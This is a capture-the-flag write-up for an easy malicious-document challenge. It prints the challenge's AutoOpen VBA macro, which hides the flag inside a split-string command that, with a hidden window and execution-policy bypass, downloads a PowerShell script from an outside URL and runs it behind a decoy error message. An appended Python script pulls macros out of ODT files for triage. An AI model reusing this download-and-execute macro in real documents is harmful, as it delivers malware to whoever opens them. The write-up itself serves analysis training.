Level - Easy
Description:
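Good morning, China. Right now I have ice cream. I really like ice cream, but Fast & Furious 9, compared to ice cream... Fast & Furious, Fast & Furious 9 is my favorite. So... now it's music time. Ready, 1 2 3. In two weeks, Fast & Furious 9 ×3. Don't forget, don't miss it. Remember to go to the cinema to see Fast & Furious 9, because it's a very good movie, the action is very good, almost the same as ice cream. Goodbye.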
[bingchilling.zip]
This ODT/DOCX file has a malicious macro inside. By using OLE tools, turning it into a ZIP and looking inside Basic/Project/NewMacros.xml, or extracting it another way, you'll find the following VBA:
Sub AutoOpen()
Dim FGHNBVRGHJJGFDSDUUUU As String
FGHNBVRGHJJGFDSDUUUU = "cmd /K " + "byu" + "ctf" + "{" + "m@ldocs @re" + "sn@eky and bad}" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://bsrc.baidu.com/drill/doc-zh.html','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"
Shell FGHNBVRGHJJGFDSDUUUU, 0
MsgBox ("Module could not be found.")
End Sub
From here, it's pretty easy to see the flag inside.
Flag - byuctf{m@ldocs @re sn@eky and bad}
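The ZIP route described above can be scripted for triage. This is an added example, not part of the original writeup: it reads every Basic module out of an ODT container and joins split string literals so the real command line is readable. The sample document is constructed inline, the function names are hypothetical, and the literal folding is deliberately simple (it ignores doubled-quote escapes).

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

MODULE_TAG = "{http://openoffice.org/2000/script}module"
CONCAT = re.compile(r'"([^"\n]*)"[ \t]*[+&][ \t]*"([^"\n]*)"')

def build_sample_odt() -> bytes:
    """Constructed sample: a minimal ODT-style ZIP holding one Basic module."""
    macro = ('Sub AutoOpen()\n'
             'Dim s As String\n'
             's = "cmd /K " + "ex" + "ample" + "{" + "constructed" + "}"\n'
             'Shell s, 0\n'
             'End Sub\n')
    module = ('<?xml version="1.0" encoding="UTF-8"?>\n'
              '<script:module xmlns:script="http://openoffice.org/2000/script" '
              'script:name="NewMacros" script:language="StarBasic">'
              + escape(macro) + '</script:module>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Basic/Project/NewMacros.xml", module)
        zf.writestr("content.xml", "<doc/>")  # non-macro member, ignored below
    return buf.getvalue()

def extract_macros(odt_bytes: bytes) -> dict:
    """Return {zip member name: Basic source} for each module under Basic/."""
    macros = {}
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("Basic/") and name.endswith(".xml"):
                root = ET.fromstring(zf.read(name))
                # Library index files have a different root element; skip them.
                if root.tag == MODULE_TAG:
                    macros[name] = root.text or ""
    return macros

def fold_literals(source: str) -> str:
    """Join adjacent "a" + "b" literals until nothing is left to merge."""
    while True:
        source, n = CONCAT.subn(lambda m: '"' + m.group(1) + m.group(2) + '"', source)
        if n == 0:
            return source

def review(odt_bytes: bytes) -> dict:
    """Per module: folded lines that auto-run or launch a process."""
    flag = re.compile(r"\b(AutoOpen|Shell|cmd|powershell)\b", re.I)
    return {name: [l.strip() for l in fold_literals(src).splitlines() if flag.search(l)]
            for name, src in extract_macros(odt_bytes).items()}
```

On a real sample, call `review(open(path, "rb").read())` and read the folded `Shell` argument instead of piecing the fragments together by eye.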